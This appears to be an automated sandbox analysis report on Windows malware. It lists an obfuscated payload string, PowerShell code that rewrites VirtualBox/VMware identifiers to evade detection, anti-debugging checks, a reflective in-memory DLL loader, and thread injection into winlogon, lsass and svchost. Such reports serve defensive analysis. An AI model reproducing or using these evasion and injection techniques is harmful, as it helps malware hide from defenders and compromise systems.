CTbAkTYQaQAOJJefLZqlRrBorNtjZooPEFKYOEVxlDfzTAhBw%X%ycHKKTlsNjwAORLCKjdYgrhdSZolcvQGSNAmGeULzFbuzXwMtWirdCqgVDSKFZprtPIbqzVFpszApN%n%EUDBSfnzDpwuqcmjfzqJaKpuwTbCbKdQRiZXgehjeUlsEWjTtfmZkFMUEifYeKxSmGCidodbsgFgyX%O%QAKhiVydGlwftYYiftxsfXtaQfckHdaFvHsEoWBBujarMXVecjblJfRShJrdTnvClQJLGuUiRVYWXc%b%nSjXiycOWqQzxEFyIgNxfWojyIoTtOhUUfvzUVfXAxTtVgWqDtmSjzWrDZyzjiuijVEsifDMaQXIcV%l%osMYqaBoLvieVUxFNrcLkaBDhxPARtCnpILgNkSuHUjjkekJpvcFFqLoRiQSkaxsTUOnjrSDyIepQs%c%tdngkwqWHYWxoEuakGwRpppWAYDzgXlvxzPNFdPbbWnQrMcniyyyTYceOqGmSRPKMAZPPGugQvPtbz%b%FNWpqHzNCzwLZoxDijgDdQMmyBerIxiIcoLSqDBhkZYzsdHgJmmGmywObJQODhfeqNIKCEnFIYseSm%w%TuUYIvlCwDSWRGMNEcTTjEuXDeZHXngsWOPwUFzKTNrfSGNGSUupkYdoZWuEvDFiwAadQqTYDjZwnp%=$%WrsOcSQhXKBwXkUopiiIsFJPCbwLbZGbKSymcOCqGscspUVNIUKo%n%fGMrHCmbwegYeALfMHlAGScaDrAIfJdgosVdfgFzCATBleoPiQaa%u%JjHmEMOqcEVMbaJLEIZFcLYfYBOzcLzoJcwfKJzsspxXFhzkuDkA%l%RuYXkCocXpnreGcZEEaUiGnNnbAQbEezAZxpeyViuwvdbgSYeAGQ%l%DqrkhlJicxbtkOQfiNVfIRAMljLhiBMBXoWkIniSOMgXvbTnpNQr%,%FBhLQEYXACZALzwWRGwVFcqWLCrkpxRvLuWwgkudoksmMFlVFXwJ% %qVLCklannOIcLEPqDZPGltGvJekfqvFsbhfQJtlVkgPABpBiPVrF%$%hPxXoqTgbUWSjqbDzZHkOUveDfTtDbpvdZklJhBszfUqkXrlnXJQ%w%ngRntstjxzCZEBOjfQTrypKIafUGOHgFszhXiWRqOrUaDULJiigx%j%errYvinnyNvQtWGftRaiYCDguKffulxGAIBahjBaJESaWeHGoGpr%U%hXyBOlELdiTmqOpKvFXkpazuJCjpdzROVfyDjamWFPWAKFKhPXlI%z%IfbhxeRmboIEqfrkqLAutbFAdYJeSbAgoifPdqffiZUqhsjEozRd%C%wQoHABdyuNuZNCqiaBgZFultgosKOfPskwJxUxpCmGLvFUCEcbEM%)%tRxbEUBmitJpXcPqSSnClEMYJQOlLOINAdYtZHTZWdtTXvyDflLk%"
Source: svchost.exe, 0000001B.00000003.1623014097.000002A76A5C1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: svchost.exe, 0000001B.00000000.1618024236.000002A76A55F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000021.00000000.1658255735.000002517802B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000026.00000000.1684153826.00000297A5600000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000009.00000002.2764499577.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 0000000C.00000000.1502576174.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 0000001B.00000002.2841236522.000002A76A989000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000E.00000000.1544586967.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: spoolsv.exe, 00000031.00000002.2729852206.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.exe, 00000031.00000000.1757295956.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\|\|

Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_7-616
Source: C:\Windows\System32\dllhost.exe	API call chain: ExitProcess graph end node			graph_7-702

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_000001CA7D1E84B0

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,

8_2_000001CA7D1E1E3C

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,

7_2_0000000140001CF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001CA7D218814
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D2984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D2984B0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000001CA7D29CD80
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D298814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000001CA7D298814
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0000017D2DD58814
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0000017D2DD8CD80
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0000017D2DD884B0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD88814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0000017D2DD88814
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000022F4B9284B0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00000262F1C98814
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1C9CD80
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1C984B0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1D084B0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DF8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00000262F1DF8814
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1DFCD80
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DF84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00000262F1DF84B0
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001C115C7CD80
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001C115C784B0
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000001C115C78814
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001C115CACD80
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001C115CA84B0
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_000001C115CA8814
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497F8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_000001BB497F8814
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001BB497FCD80
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497F84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001BB497F84B0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0000023942B18814
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E138814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002234E138814
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E1384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002234E1384B0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002234E13CD80
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E168814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000002234E168814
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E1684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002234E1684B0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000002234E16CD80
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_000001EF05708814
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000001EF057084B0
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD78814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_000002287AD78814
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000002287AD784B0
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000002287AD7CD80
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_000001B94DA98814
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001B94DA9CD80
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000001B94DA984B0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_0000025202578814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_0000025202578814
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00000252025784B0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000002520257CD80
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00000252025A8814
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00000252025A84B0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00000252025ACD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_000001A9EBFC8814
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_000001A9EBFCCD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_000001A9EBFC84B0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC6884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_000001A9EC6884B0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_000001A9EC68CD80
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC688814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_000001A9EC688814

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: ipwho.is

.NET source code references suspicious native API functions

Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.cs	Reference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

7_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F20A2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84182EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 78732EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25D92EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A5D82EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F41C2EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25342EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: FC902EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F3532EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26282EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 31E62EBC	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A172EBC
